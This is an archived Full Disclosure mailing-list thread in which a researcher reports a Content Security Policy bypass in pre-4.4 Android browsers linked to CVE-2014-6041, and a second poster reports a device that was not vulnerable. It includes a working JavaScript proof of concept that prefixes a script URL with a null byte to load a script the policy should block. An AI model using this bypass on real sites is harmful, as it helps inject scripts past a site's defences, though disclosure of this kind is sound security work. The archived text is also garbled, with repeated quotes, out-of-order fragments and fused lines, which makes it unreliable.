Vitor Ventura
2014-10-14 11:33:14 UTC
---------- Mensagem encaminhada ----------
De: "Vitor Ventura" <ventura.vitor-***@public.gmane.org>
Data: 14/10/2014 12:32
Assunto: Re: [FD] CSP Bypass on Android prior to 4.4
Para: "E Boogie" <evanjjohns-***@public.gmane.org>
Cc:
Hello,
My testing was done on BQ aquaris 5 HD with android 4.2.1 using chrome.
It wasn't vulnerable.
Regards
VV
De: "Vitor Ventura" <ventura.vitor-***@public.gmane.org>
Data: 14/10/2014 12:32
Assunto: Re: [FD] CSP Bypass on Android prior to 4.4
Para: "E Boogie" <evanjjohns-***@public.gmane.org>
Cc:
Hello,
My testing was done on BQ aquaris 5 HD with android 4.2.1 using chrome.
It wasn't vulnerable.
Regards
VV
I've done a little more testing and what I've found is pretty startling.
I tested on a Galaxy Note 2 running Android 4.4.2 and the CSP bypass
worked.
I also tested on an old version of Safari on an iPad (Safari/7534.48.3) and
the CSP bypass also worked.
If you are so kind, please use ejj.io/test.php to test this for me. If it
worked, please press the "IT WORKED" button.
This way I can compile a large finger print of browsers/phones/versions the
CSP bypass worked on (based on user-agent)
Evan J.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041
an emulator for Android 4.3.1.
alert(2);}}, 400);
you see the popup.
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
I tested on a Galaxy Note 2 running Android 4.4.2 and the CSP bypass
worked.
I also tested on an old version of Safari on an iPad (Safari/7534.48.3) and
the CSP bypass also worked.
If you are so kind, please use ejj.io/test.php to test this for me. If it
worked, please press the "IT WORKED" button.
This way I can compile a large finger print of browsers/phones/versions the
CSP bypass worked on (based on user-agent)
Evan J.
I've found a Content Security Policy bypass similar and related to the
same origin policy bypass in CVE-2014-6041.https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041
I've tested this on an Android 4.3 tablet running a bunch of different
browsers, including Inbrowser, Firefox, and the default Android browser onan emulator for Android 4.3.1.
<input type=button value="test" onclick="
a=document.createElement('script');
a.id='AA';
a.src='\u0000https://js.stripe.com/v2/';
document.body.appendChild(a);
setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{a=document.createElement('script');
a.id='AA';
a.src='\u0000https://js.stripe.com/v2/';
document.body.appendChild(a);
alert(2);}}, 400);
return false;">
The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v3/ ;
The PoC worked if you see a popup containing stripes e(){} object. I set
the Timeout kind of short, so you may have to press the button twice beforeThe content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v3/ ;
The PoC worked if you see a popup containing stripes e(){} object. I set
you see the popup.
I have a PoC test page at ejj.io/test.php
Cheers,
Evan J
--
Evan J Johnson
_______________________________________________Cheers,
Evan J
--
Evan J Johnson
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/